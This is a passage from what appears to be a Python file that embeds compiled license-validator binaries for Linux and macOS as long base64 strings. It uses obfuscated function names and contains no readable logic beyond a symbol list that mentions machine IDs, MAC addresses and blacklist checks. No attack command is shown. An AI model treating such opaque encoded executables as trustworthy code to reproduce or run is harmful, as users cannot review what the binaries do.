AAAAAAAAAAAAAAAAAaA4AABIAAAAAAAAAAAAAAAAAAAAAAAAAhg4AACIADQCEaEAAAAAAABIAAAAAAAAAkQ4AABIAAAAAAAAAAAAAAAAAAAAAAAAA4A4AABIAAAAAAAAAAAAAAAAAAAAAAAAA/A4AABIAAAAAAAAAAAAAAAAAAAAAAAAAFA8AABIAAADQHEAAAAAAAAAAAAAAAAAAXA8AABIAAAAAAAAAAAAAAAAAAAAAAAAAeg8AABIAAAAAAAAAAAAAAAAAAAAAAAAAvw8AABIAAAAAAAAAAAAAAAAAAAAAAAAA3g8AACIADQAeZ0AAAAAAADwAAAAAAAAA/Q8AABAA8f9MhGAAAAAAAAAAAAAAAAAABBAAABIAAAAAAAAAAAAAAAAAAAAAAAAAHhAAABIAAAAgHUAAAAAAAAAAAAAAAAAAPxAAABIAAAAAAAAAAAAAAAAAAAAAAAAAhxAAACIADQBaZ0AAAAAAABQAAAAAAAAAoRAAABIAAAAAAAAAAAAAAAAAAAAAAAAAuRAAABIAAAAAAAAAAAAAAAAAAAAAAAAA0xAAABIAAAAAAAAAAAAAAAAAAAAAAAAA+xAAABIAAAAAAAAAAAAAAAAAAAAAAAAAGhEAABIADQCwKEAAAAAAAEoGAAAAAAAATxEAABIAAAAAAAAAAAAAAAAAAAAAAAAAbREAABIAAAAAAAAAAAAAAAAAAAAAAAAAuhEAABIAAAAAAAAAAAAAAAAAAAAAAAAADxIAABIAAAAAAAAAAAAAAAAAAAAAAAAAURIAABIAAAAAAAAAAAAAAAAAAAAAAAAAZBIAABIADQCjY0AAAAAAACUDAAAAAAAAaRIAABIACwA4GUAAAAAAAAAAAAAAAAAAAGNhbGxfZ21vbl9zdGFydABjcnRzdHVmZi5jAF9fQ1RPUl9MSVNUX18AX19EVE9SX0xJU1RfXwBfX0pDUl9MSVNUX18AX19kb19nbG9iYWxfZHRvcnNfYXV4AGNvbXBsZXRlZC42MzQ5AGR0b3JfaWR4LjYzNTEAZnJhbWVfZHVtbXkAX19DVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kb19nbG9iYWxfY3RvcnNfYXV4AGFlc2NyaXB0c1ZhbGlkYXRvci5jcHAAX1pTdEw4X19pb2luaXQAX1pOOWFlc2NyaXB0c0wxNmJ1Zl90b19oZXhzdHJpbmdFUGhqAF9aTjlhZXNjcmlwdHNMMTZoZXhzdHJpbmdfdG9fYnVmRVBoalMwXwBfWkwxMkJpdF9NYW5nbGVfMWlpaWlpaWkAX1pMMTJCaXRfTWFuZ2xlXzJpaWlpaWlpAF9aTDEyQml0X01hbmdsZV8zaWlpaWlpaQBfWkwxMkJpdF9NYW5nbGVfNGlpaWlpaWkAX1pMMTJCaXRfTWFuZ2xlXzVpaWlpaWlpAF9aTDE0YmxhY2tMaXN0QXJyYXkAX1pMOHNtb2R1bHVzaWkAX1pMOG51bXRvc3RyagBfWkw5bG9uZ3Rvc3RyeQBfWkwxMW51bXRvaGV4c3RyagBfWkw5cGFkRGlnaXRzU3NqAF9aTDhjaHJSZW1hcGNQU3MAX1pMOGtleVJlbWFwalBTc2kAX1pMOWtleVdpemFyZGpqalBQRmlpaWlpaWlpRVBTc2JpAF9aTDE4SXNMaWNlbnNlVHlwZVZhbGlkU3MAX1pMMTFSZW1vdmVTdGVwc1JTc2ppU19TXwBfWkwxNWdldENoZWNrc3VtX29sZFNzU3MAX1pMMTFnZXRDaGVja3N1bVNzU3MAX1pMMTJnZXRWZXJpZkNvZGVTc2oAX1pMMTBnZXREZXRhaWxzUlNzU19TX1NfU18AX1pMMTJnZXRQdWJsaWNLZXlTc2lpAF9aNDFfX3N0YXRpY19pbml0aWFsaXphdGlvbl9hbmRfZGVzdHJ1Y3Rpb25fMGlpAF9HTE9CQUxfX0lfX1pOOWFlc2NyaXB0czEyZ2V0TWFjaGluZUlkRVJBMTI4X2MAX1paTDE4X19ndGhyZWFkX2FjdGl2ZV9wdkUyMF9fZ3RocmVhZF9hY3RpdmVfcHRyAF9HTE9CQUxfT0ZGU0VUX1RBQkxFXwBfX2luaXRfYXJyYXlfZW5kAF9faW5pdF9hcnJheV9zdGFydABfRFlOQU1JQwBkYXRhX3N0YXJ0AF9aTlN0OGlvc19iYXNlNHNldGZFU3QxM19Jb3NfRm10ZmxhZ3NTMF8AX1pOOWFlc2NyaXB0czEzT3V0QXNVbnNpZ25lZEVjAF9aTlNzYVNFUEtjQEBHTElCQ1hYXzMuNABfWk5Tc0MxRXZAQEdMSUJDWFhfMy40AF9aTlN0MTRiYXNpY19pZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRTVjbG9zZUV2QEBHTElCQ1hYXzMuNABfWk5Tb2xzRWlAQEdMSUJDWFhfMy40AF9aTlNzcExFUEtjQEBHTElCQ1hYXzMuNABtZW1zZXRAQEdMSUJDXzIuMi41AF9fbGliY19jc3VfZmluaQBfWk5TczVjbGVhckV2QEBHTElCQ1hYXzMuNABzaHV0ZG93bkBAR0xJQkNfMi4yLjUAX3N0YXJ0AF9aU3RwbEljU3QxMWNoYXJfdHJhaXRzSWNFU2FJY0VFU2JJVF9UMF9UMV9FUktTNl9TOF8AX1pTdG9yU3QxM19Jb3NfRm10ZmxhZ3NTXwBfWk5LU3M2c3Vic3RyRW1tQEBHTElCQ1hYXzMuNABpb2N0bEBAR0xJQkNfMi4yLjUAX1pOU3NwTEVjQEBHTElCQ1hYXzMuNABfX2dtb25fc3RhcnRfXwBfSnZfUmVnaXN0ZXJDbGFzc2VzAF9aTktTczVjX3N0ckV2QEBHTElCQ1hYXzMuNABfWm5hbUBAR0xJQkNYWF8zLjQAX1pOMTdNQUNBZGRyZXNzVXRpbGl0eTE4R2V0QWxsTUFDQWRkcmVzc2VzRVBoAF9maW5pAF9aTlNpNXRlbGxnRXZAQEdMSUJDWFhfMy40AF9aTktTczRzaXplRXZAQEdMSUJDWFhfMy40AF9aTlN0OGlvc19iYXNlNEluaXRDMUV2QEBHTElCQ1hYXzMuNABfWjE4Y2hlY2tCbGFja0xpc3Rfb2xkaWkAX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMi41AF9aU3RvclN0MTNfSW9zX09wZW5tb2RlU18AX1pTdGxzSVN0MTFjaGFyX3RyYWl0c0ljRUVSU3QxM2Jhc2ljX29zdHJlYW1JY1RfRVM1X2hAQEdMSUJDWFhfMy40AF9aTlNpNXNlZWtnRWxTdDEyX0lvc19TZWVrZGlyQEBHTElCQ1hYXzMuNABfWlN0b1JSU3QxM19Jb3NfRm10ZmxhZ3NTXwBfWk5Tc0MxRVJLU3NAQEdMSUJDWFhfMy40AF9fY3hhX2F0ZXhpdEBAR0xJQkNfMi4yLjUAX1pOMTdNQUNBZGRyZXNzVXRpbGl0eTE4R2V0TUFDQWRkcmVzc0xpbnV4RVBoAF9aTlNpNHJlYWRFUGNsQEBHTElCQ1hYXzMuNABfWjE0Y2hlY2tCbGFja0xpc3RpaWlpAF9aTktTczZsZW5ndGhFdkBAR0xJQkNYWF8zLjQAX1pOOWFlc2NyaXB0czExTGljZW5zZURhdGFDMkV2AF9aTlN0OGlvc19iYXNlNEluaXREMUV2QEBHTElCQ1hYXzMuNABnZXRwd3VpZEBAR0xJQkNfMi4yLjUAX1pTdGxzSVN0MTFjaGFyX3RyYWl0c0ljRUVSU3QxM2Jhc2ljX29zdHJlYW1JY1RfRVM1X1BLY0BAR0xJQkNYWF8zLjQAX1pTdHBsSWNTdDExY2hhcl90cmFpdHNJY0VTYUljRUVTYklUX1QwX1QxX0VSS1M2X1BLUzNfAF9JT19zdGRpbl91c2VkAF9aTlNvNXdyaXRlRVBLY2xAQEdMSUJDWFhfMy40AF9aTlNzRDFFdkBAR0xJQkNYWF8zLjQAX19kYXRhX3N0YXJ0AF9aTjlhZXNjcmlwdHMxMmdldE1hY2hpbmVJZEVSQTEyOF9jAGJjb3B5QEBHTElCQ18yLjIuNQBzcHJpbnRmQEBHTElCQ18yLjIuNQBfWk5Tc3BMRVJLU3NAQEdMSUJDWFhfMy40AF9aU3Rjb1N0MTNfSW9zX0ZtdGZsYWdzAF9aU3Q3c2V0ZmlsbEljRVN0OF9TZXRmaWxsSVRfRVMxXwBfWlN0M2hleFJTdDhpb3NfYmFzZQBfWjRrZXkxU3NpAGF0b2xAQEdMSUJDXzIuMi41AF9aTjlhZXNjcmlwdHM3Z2V0UGF0aEVTc2JSU3MAX1pOU3NDMUVQS2NSS1NhSWNFQEBHTElCQ1hYXzMuNABfWk45YWVzY3JpcHRzMTdzYXZlTGljZW5zZVRvRmlsZUVQS2NQYwBfWlN0NGNvdXRAQEdMSUJDWFhfMy40AF9aTlN0MTRiYXNpY19pZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRUQxRXZAQEdMSUJDWFhfMy40AF9aMTRtYWtlU2VlZHNBcnJheVNzaQBfX2Rzb19oYW5kbGUAX1pTdGFOUlN0MTNfSW9zX0ZtdGZsYWdzU18AX1pOU3NpeEVtQEBHTElCQ1hYXzMuNABfX0RUT1JfRU5EX18AX19saWJjX2NzdV9pbml0AGF0b2lAQEdMSUJDXzIuMi41AF9aTlN0MTRiYXNpY19vZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRUQxRXZAQEdMSUJDWFhfMy40AF9aTlN0MThiYXNpY19zdHJpbmdzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRVNhSWNFRUMxRVN0MTNfSW9zX09wZW5tb2RlQEBHTElCQ1hYXzMuNABfWk5Tb2xzRWpAQEdMSUJDWFhfMy40AF9aTjlhZXNjcmlwdHMxOWxvYWRMaWNlbnNlRnJvbUZpbGVFUEtjUkExMjhfYwBfWk5TdDE0YmFzaWNfb2ZzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRUU1Y2xvc2VFdkBAR0xJQkNYWF8zLjQAc29ja2V0QEBHTElCQ18yLjIuNQBfWk5LU3Q0ZnBvc0kxMV9fbWJzdGF0ZV90RWN2bEV2AF9aMTNyZXZlcnNlU3RyaW5nU3MAX19ic3Nfc3RhcnQAX1pTdGxzSWNTdDExY2hhcl90cmFpdHNJY0VTYUljRUVSU3QxM2Jhc2ljX29zdHJlYW1JVF9UMF9FUzdfUktTYklTNF9TNV9UMV9FQEBHTElCQ1hYXzMuNABzdHJjbXBAQEdMSUJDXzIuMi41AF9aTlNhSWNFRDFFdkBAR0xJQkNYWF8zLjQAc3RyY3B5QEBHTElCQ18yLjIuNQBfWk5TczVlcmFzZUVtbUBAR0xJQkNYWF8zLjQAZ2V0dWlkQEBHTElCQ18yLjIuNQBfWmRhUHZAQEdMSUJDWFhfMy40AHB0aHJlYWRfY2FuY2VsAF9aTlNzNmFwcGVuZEVQS2NAQEdMSUJDWFhfMy40AF9aTlN0MTRiYXNpY19vZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRTdpc19vcGVuRXZAQEdMSUJDWFhfMy40AF9aTlN0MTRiYXNpY19pZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRUMxRVBLY1N0MTNfSW9zX09wZW5tb2RlQEBHTElCQ1hYXzMuNABfZW5kAF9aTlNvbHNFUEZSU29TX0VAQEdMSUJDWFhfMy40AF9aU3Q0c2V0d2kAX1pOU3QxNGJhc2ljX29mc3RyZWFtSWNTdDExY2hhcl90cmFpdHNJY0VFQzFFUEtjU3QxM19Jb3NfT3Blbm1vZGVAQEdMSUJDWFhfMy40AF9fY3hhX2VuZF9jYXRjaEBAQ1hYQUJJXzEuMwBfWk5TaXJzRVJtQEBHTElCQ1hYXzMuNABfWlN0NGVuZGxJY1N0MTFjaGFyX3RyYWl0c0ljRUVSU3QxM2Jhc2ljX29zdHJlYW1JVF9UMF9FUzZfQEBHTElCQ1hYXzMuNABfX2N4YV9iZWdpbl9jYXRjaEBAQ1hYQUJJXzEuMwBfWk5TdDE4YmFzaWNfc3RyaW5nc3RyZWFtSWNTdDExY2hhcl90cmFpdHNJY0VTYUljRUVEMUV2QEBHTElCQ1hYXzMuNABfWk5TczlwdXNoX2JhY2tFY0BAR0xJQkNYWF8zLjQAX1pOOWFlc2NyaXB0czExTGljZW5zZURhdGFDMUV2AF9lZGF0YQBfWk5TYUljRUMxRXZAQEdMSUJDWFhfMy40AF9fZ3h4X3BlcnNvbmFsaXR5X3YwQEBDWFhBQklfMS4zAF9aTktTdDE4YmFzaWNfc3RyaW5nc3RyZWFtSWNTdDExY2hhcl90cmFpdHNJY0VTYUljRUUzc3RyRXZAQEdMSUJDWFhfMy40AF9aU3RhblN0MTNfSW9zX0ZtdGZsYWdzU18AX1Vud2luZF9SZXN1bWVAQEdDQ18zLjAAX1pOU3NhU0VSS1NzQEBHTElCQ1hYXzMuNABfWk5Tb2xzRVBGUlN0OGlvc19iYXNlUzBfRUBAR0xJQkNYWF8zLjQAX1pOU3M2YXBwZW5kRVJLU3NAQEdMSUJDWFhfMy40AF9aTjlhZXNjcmlwdHMxNXZhbGlkYXRlTGljZW5zZUVQY2lSTlNfMTFMaWNlbnNlRGF0YUUAX1pOS1NzNGZpbmRFUEtjbUBAR0xJQkNYWF8zLjQAX1pTdGxzSWNTdDExY2hhcl90cmFpdHNJY0VFUlN0MTNiYXNpY19vc3RyZWFtSVRfVDBfRVM2X1N0NV9TZXR3QEBHTElCQ1hYXzMuNABfWlN0bHNJY1N0MTFjaGFyX3RyYWl0c0ljRUVSU3QxM2Jhc2ljX29zdHJlYW1JVF9UMF9FUzZfU3Q4X1NldGZpbGxJUzNfRUBAR0xJQkNYWF8zLjQAX1pOU3QxNGJhc2ljX2lmc3RyZWFtSWNTdDExY2hhcl90cmFpdHNJY0VFN2lzX29wZW5FdkBAR0xJQkNYWF8zLjQAbWtkaXJAQEdMSUJDXzIuMi41AG1haW4AX2luaXQA')
return R
raise Exception('unsupported operating system:' + bw())
def ertuze(a):
if a.__isMacOs():
R = at(
'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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAagBIieVIg+TwSIt9CEiNdRCJ+oPCAcHiA0gB8kiJ0esESIPBCEiDOQB19kiDwQjoCAAAAInH6F9JAAD0VUiJ5UFWU0iB7JAAAABIifNIiwXMXQAASIsASIlF6IP/Aw+E+gAAAEiLHaVdAABIjTXSSwAASInfuikAAADo00gAAEiLA0iLeOhIAd++CgAAAOj/RwAAD77wSInf6BJIAABIicfoEEgAAEiNNcFLAABIid+6MAAAAOiYSAAASIsDSIt46EgB374KAAAA6MRHAAAPvvBIid/o10cAAEiJx+jVRwAASI01t0sAAEiJ37ovAAAA6F1IAABIiwNIi3joSAHfvgoAAADoiUcAAA++8EiJ3+icRwAASInH6JpHAABIjTWsSwAASInfujsAAADoIkgAAEiLA0iLeOhIAd++CgAAAOhORwAAD77wSInf6GFHAABIicfoX0cAALj/////6ybGhWD///8ASItzEEyNtWD///9MiffoTEgAAEiLewhMifboUD0AAEiLDZVcAABIiwlIO03odQxIgcSQAAAAW0FeXcPo40cAAJCQkJCQkJCQkJCQVUiJ5VNQSI0dw14AAEiJ3+iHRwAASIs9PFwAAEiNFf3r//9Iid5Ig8QIW13poUcAAFVIieUwwF3DVUiJ5TDAXcNVSInlQVdBVkFVQVRTSIPsGEiJ80iJ+EiJx0mJxUiJ3uj6RgAASIsDSGNA6EmJxEn33EiNSP9IiU3Q6xRMAfhFiDQESP9N0EiLRcj/yEn/xIXAfkJIiUXISIsDg3j4AHgLSInf6G5GAABIiwNIi03QRIo0CEyLeOhJi0UAg3j4AHi6TInoSInHSYnF6EdGAABJi0UA66ZMiehIg8QYW0FcQV1BXkFfXcNIicNMie/ockYAAEiJ3+jQRgAA6K1GAABVSInlQVdBVkFVQVRTSIPseIm1bP///0mJ/kiNXZhMjX2g6z+5//////APwUj4hcl/CUiNdbjo4kUAAEiLRZhIjXjoSDs9BVsAAHQXuf/////wD8FI+IXJfwlIjXXA6LpFAABNiy5Ni2XoSYP8CQ+HpwAAAEiJ30iNNTRKAABIjVWQ6MxFAABMif9Iid5MifLoHEUAAEyJ90yJ/uihRQAASItFoEiNeOhIOz2gWgAAdIrpbv///0iJw+srSInDSItFoEiNeOhIOz2CWgAAdBe5//////APwUj4hcl/CUiNdcjoN0UAAEiLRZhIjXjoSDs9WloAAA+EgwEAALn/////8A/BSPiFyQ+PcQEAAEiNddDoB0UAAOljAQAAuQgAAABMieBI9+FIicMPkMFIidhIg8AID5LCCMpIx8f/////SA9E+OhxRQAASInHSIPj+EiNNUlcAABMiSdIg8cISIm9cP///0iJ2uiVRQAARTHku//////rHbn/////8A/BSPiFyX8JSI11sOiQRAAATYsuQf/ERYnnTTt96A+DxQAAAESJ4DHS97Vs////hdJ1JP/DSGPDSIuNcP///0iNPMFIiwTBSItQ6DH2Mcnod0QAAE2LLkGDffgAeAtMiffoNUQAAE2LLkOKRD0AiEWOxkWPAEiNfYBIjXWOSI2VeP///+hORAAASGPDSIuNcP///0iNPMFIjXWA6BlEAABIi0WASI146Eg7PSRZAAAPhFz////pQP///+tDSInDSItFgEiNeOhIOz0FWQAAdDK5//////APwUj4hcl/JEiNdajoukMAAOsZSIuFcP///0iDxHhbQVxBXUFeQV9dw0iJw0iJ3+hFRAAAVUiJ5UFXQVZBVUFUU0iB7GgGAACJ80iLBcxYAABIiwBIiUXQSIs3SI29cPv//0iNlWj7///ok0MAAEiLBYhYAABIg8AYSImFYPv//0iJhVj7//9IiYVQ+///SImFSPv//0Uw5IH7oIYBAImdgPn//w+MZh0AAEiNvXD7//9IjTWmRwAAMdK5AQAAAOitQgAASInDSI1TAUiNvXD7//9IjTWFRwAAuQEAAADojkIAAEmJxUmNVQFIjb1w+///SI01ZkcAALkBAAAA6G9CAABJicdJjVcBSI29cPv//0iNNUdHAAC5AQAAAOhQ